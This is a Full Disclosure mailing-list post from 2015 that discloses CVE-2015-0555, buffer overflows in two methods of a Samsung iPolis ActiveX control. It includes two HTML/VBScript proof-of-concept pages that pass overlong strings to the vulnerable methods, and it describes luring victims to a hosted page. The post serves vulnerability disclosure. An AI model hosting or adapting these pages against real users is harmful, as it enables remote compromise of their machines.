[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities
From: Praveen D <praveend.hac () gmail ! com>
Date: 2015-02-20 19:29:20
Message-ID: CABjjeykNjzrw664YGkrpbiuq+8EZaDmcmc3Q1+yV9JgRy2U=hw () mail ! gmail ! com
[Download RAW message or body]
CVE-2015-0555
Introduction
*************************************************************
There is a Buffer Overflow Vulnerability which leads to Remote Code
Execution.
Vulnerability is due to input validation to the API ReadConfigValue and
WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx
This is different from CVE-2014-3911 as the version of iPolis 1.12.2
(latest as of 12/12/2014).
CVE-2014-3911 is related to different ActiveX and on older iPolis version
Discovery MEthod: Fuzzing
Exploiting: It is a client side attack where attacker can host a crafted
HTML web page with malicious payload and entice the victim to browse to the
hosted page to compromise the victim.
Operating System: Windows 7 Ultimate N SP1
*************************************************************
Vulnerability1:
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution*
******************Proof of Concept (PoC)**************8
</html>
<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue()
Remote Code Execution</head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\Samsung\iPOLiS Device
Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName = "ReadConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 1
arg1=String(1044, "A")
target.ReadConfigValue arg1
</script>
</html>
*****************************************************************************************
*Vulnerability2: *
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution
*
*******************Proof of Concept (PoC)*********************
<html>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\Samsung\iPOLiS Device
Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal
szValue As String ) As Long"
memberName = "WriteConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 2
arg1=String(14356, "A")
arg2="defaultV"
target.WriteConfigValue arg1 ,arg2
</script></job></package>
</html>
****************************************************************************
CERT contacted Samsung but there wasn't any response from Samsung.
Refer http://blog.disects.com for more details
Best Regards,
Praveen Darshanam
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic